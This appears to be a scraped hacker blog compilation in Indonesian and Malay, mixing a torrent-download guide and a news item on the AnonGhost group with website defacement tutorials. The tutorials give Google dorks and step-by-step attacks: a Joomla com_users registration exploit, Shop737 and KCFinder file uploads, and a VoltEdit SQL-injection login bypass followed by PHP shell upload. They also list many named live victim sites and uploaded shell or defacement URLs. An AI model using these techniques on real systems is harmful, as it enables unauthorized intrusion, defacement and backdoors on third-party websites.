CARA DOWNLOAD FILE TORRENT DENGAN IDM

Buat Yang Belum Punya IDM bisa di download disini, IDM versi 6.15 Final versi terbaru 2013 awal ini
2. LOGIN KE ZBIGZ

Silahkan kunjungi Website Ini ZbigZ.com, dan daftar Gratis , atau Fitur Premium jika punya uang :D
3. CARI FILE TORRENT

Silahkan Cari File Torrent nya yang akan di download di Vendor-vendor penyedia Torrent, ex : http://isohunt.com/, http://www.torrentreactor.net/, http://kat.ph/, Dan lainnya
4. DOWNLOAD FILE NYA / COPY LINK ADRESS DOWNLOAD NYA

Silahkan Download file Torrent nya yana ukurannya sekitar 10-100Kb atau Copy Link download file Torrentnya
5. UPLOAD FILE TORRENT / PASTE LINK DOWNLOAD KE DALAM KOLOM

Silahkan Upload File Torrent nya / Paste Link Downloadnya Ke ZbigZ.com, lalu lik Icon Go







6. PILIH FREE (JIKA GAK PUNYA UANG, HEHEE)


Pilih Free aja tapi ada Beberapa fitur yang kurang, semua dilimit,misalnya download sudah harus sudah selesai sebelum 2 hari, soalnya setelah 2 hari file tersebut tidak bisa di download kalau menggunakan akun Free









7. TUNGGU DOWNLOAD ZBIGZ SAMPAI 100%

Tunggu zbigz mendownload file torrent nya terlebih dahulu sampai Seratus 100% itu cepet banget kok, gak nyampek 1 menit juga udah selesai medownloadnya,





8. KLIK ICON DOWNLOAD

Klik Icon Download nya (tanda anak panah kebawah) lalu Pilih Free lagi

selanjutnya IDM akan Otomatis Mwndownload File yang telah Di Klik








9. TARAAA

Download Dengan IDM sudah Bisa Dimulai









Selamat Mendownload

ONE OF THE BEST ANOYMOUS HACKER GROUP 'ANONGHOST'. CLOSED

One of the worlds most Popular Anonymous hacking group 'AnonGhost', is closed now. TheAnnouncement was made by The founders of AnonGhost on their official Facebook andtwitter page.



















AnonGhost one of the most popular Anonymous hacking network have run many operations through out their time and hacked thousands of website worldwide, including database leak, emails leak from multinational firms. Most of their attacks was concentrated on Israel and Country's supporting Israel.




We talked to Mauritania Attacker leader of Team AnonGhost and got confirmed the news. This might be our last Conversation with him, and was very short:




Techworm: What do you want to say to the world?




AnonGhost: all we wanna say is that we left cyber world with honor and if Israel do Something we will come back to punish them again.
















Techworm: ok people will like to know, leaving have something to do with fbi behind you?







Anonghost: no... no.... haha













Techworm: do u think your work is done for now?







Anonghost: :)













AnonGhost is one of the strongest Anonymous team with 24 Members:




Mauritania Attacker - Virusa Worm - SpitFir3 - Deto Beiber - Dr.SàM!M_008 - Kais Patron - Ian Surgent - M3GAFAB - PhObia_PhOney - Mr Domoz - Tak Dikenal - AnonxoxTN - Spec Tre - Raka 3r00t - Gh0st_3xp10!t - PirateX - Bl4ck Jorozz - Younes Lmaghribi - Indonesian r00t - Y0ji - BlackBase Hacker - CoderSec - h4shcr4ck - Mrlele





It might happen that AnonGhost can return in future as they mentioned, if Israel does something they will be back.









Special Goodbye From , Irfan Hazim And Programmer Aditas :)

Deface Dengan Teknik Exploit Joomla | Com_User

Assalamualaikum....

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

sebelum itu  download dulu bahan2nya :p

1. Download : Exploit Joomla.html Password: Lihat

2. Titip Nama : Indonesian Cyber Army 

UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :

http://troytradingint.com.pe/administrator/

Demo:

http://troytradingint.com.pe/

http://www.uog.edu.pk/

http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration

5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!

9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!

10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis

Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

Goodluck!!! :p

Content Created By Zahir

Microsoft Visual Studio 2010 : Offline Installer

Hi , Assalamualaikum ,




Hari nie aku nak share satu tools bagi developer dan HACKER newbie yang belajar nak wat software pishing ... iaitu VISUAL STUDIO 2010 OFFLINE INSTALLER.

Korang x payah nak install guna internet.. offline kan dah ada :)

Gune ngn sehabis baik :)

kelebihan VISUAL STUDIO 2010 OFFLINE INSTALLER:

Install Tanpa internet
Visual Basic 2010
Visual C#
Visual C++
Visual Web Developer

Masyuk kan?

Link download :

http://download.microsoft.com/download/1/E/5/1E5F1C0A-0D5B-426A-A603-1798B951DDAE/VS2010Express1.iso


Gudluck n semoga berhibur dengan ikan (Bagi Hacker)"

Thanks to ~ Muiz Faiz ,
By ~ Irfan Hazim
Signature ~ iBHCC

Deface Created Untuk Newbie

 Pada Pagi yang indah ini admin nak post cara buat deface bagi yang bru memasuki dalam bab hacker ni
 Ini cara paling senang

anda perlu ade deface creactor  link di sini 

Shop737 Exploit Tutorial ~ 14

Assalamualaikum dan salam sejahtera saya ucapkan.

Hari ni saya yang noob ni nak ajar cara depes guna method File Upload On Shop737.
Sumber dari: Mafia Security.


Dork:  intext:"Powered by Shop737"
Exploit: /poto/upload.php
Username: admin
Password: admin

Kemudian, pilih kategori 'X' nak buat baru pun boleh dan upload file depes korang. File depes yang boleh diupload cuma .TXT dan .JPG.
Kalau da berjaya upload depes, tambah url ni pula dibelakang site:
/poto/[kategori]/file.txt


Live Example:
http://www.oversindo.com/poto/x/devilcodes.txt
http://rumahsusu-karawang.com/poto/x/devilcodes.txt
http://balimalio.com/poto/x/devilcodes.txt
http://cetakexpress.com/poto/x/devilcodes.txt
http://dwosfashion.com/poto/x/devilcodes.txt
http://rumahcetakraswari.com/poto/x/devilcodes.txt

#DevilCodes ~ Dak MC . CC ~ Dak MC .

Author ~ Irfan Hazim

Autoghraph ~ BHCC 

KCFinder ~ Exploit 17

open www.google.com

search : inurl:/kcfinder/browse.php

 

live target :http://www.webhostnepal.com

 

pada web tertentu bergantung pada cms yang di gunakan , nah kalo web di atas menggunakan whmcs sepertinya , soalnya kepastian itu hanya milik Allah :D

 

jadi begini lah kira2 hasil yang telah di renovasi http://www.webhostnepal.com/portal/kcfinder/browse.php

 

*sebelumnya siapkan file html kamu*

 

-klik menu upload

-jika berhasil maka akan muncul dile kamu pada kolom di bawah sesuai nama file html kamu

dan yang terakhir jika ingin melihat hasilnya maka berada pada directory :

/public_html/portal/test/upload/files/filehtmlkamu.html

 

[sesuai cms]

 

maka akan menjadi di directory yang fulll http://www.webhostnepal.com/portal/test/upload/files/filehtml.html <= CONTOH

 

nah ini hasil dari exploit saya yang baru saja ketemu http://www.webhostnepal.com/portal/test/upload/files/kay.html

 

sekian ~ by Irfan Hazim . CC ~ Dak MC ku sayang xD 

VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vuln

==========================================================================================
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Date : 18 August 2013
: # Author : X-Cisadane
: # CMS Developer : http://www.ady-voltedge.com/website_development.php
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tested On : Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

A multiple vulnerabilities has been identified in "VoltEdit CMS", which could be exploited by attackers to bypass security restrictions into
admin panel. Login input is not well sanitized in admin.php which can lead to to include some specials chars used to change SQL syntax so we
can gain admin access. Successful exploitations allows attacker to access into administrative functions without requiring knowledge of the
password. An attackers while login as admin, may upload PHP Shell (Backdoor) use the document uploader feature.

DORKS (How to find the target) :
================================
intext:VoltEdit cms
inurl:/doing_business_here.php
inurl:/map_room.php
inurl:/colleges_universities.php
Or use your own Google Dorks

Proof of Concept
================

[ 1 ] SQL Injection Admin Login Bypass
Find the target use the dorks above, for example I'm use this dork inurl:/doing_business_here.php
and got the target www.russellville.org/doing_business_here.php
Change the target URL to /admin.php, for example www.russellville.org/admin.php
After login form appeared, fill the Login ID and Password with '=0#
Gotcha! Pic : http://i43.tinypic.com/fmtesh.png

[ 2 ] Uploading Shell / PHP Backdoor
After login with Administrator Previllege, you can upload PHP Shell
Click Documents menu & Click Choose File
Upload your PHP Shell
Go to http://TARGET/documents/Your Shell.php
Example : http://www.russellville.org/documents/botak.php3

Example of the Vulnerable Sites :
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/...
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/...
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php

By ~ Irfan Hazim

CC ~ Macho Ayie ,Rashdan Fuxing , Macho Sec , Code N , PHC , HMCA , BHCC And YOU!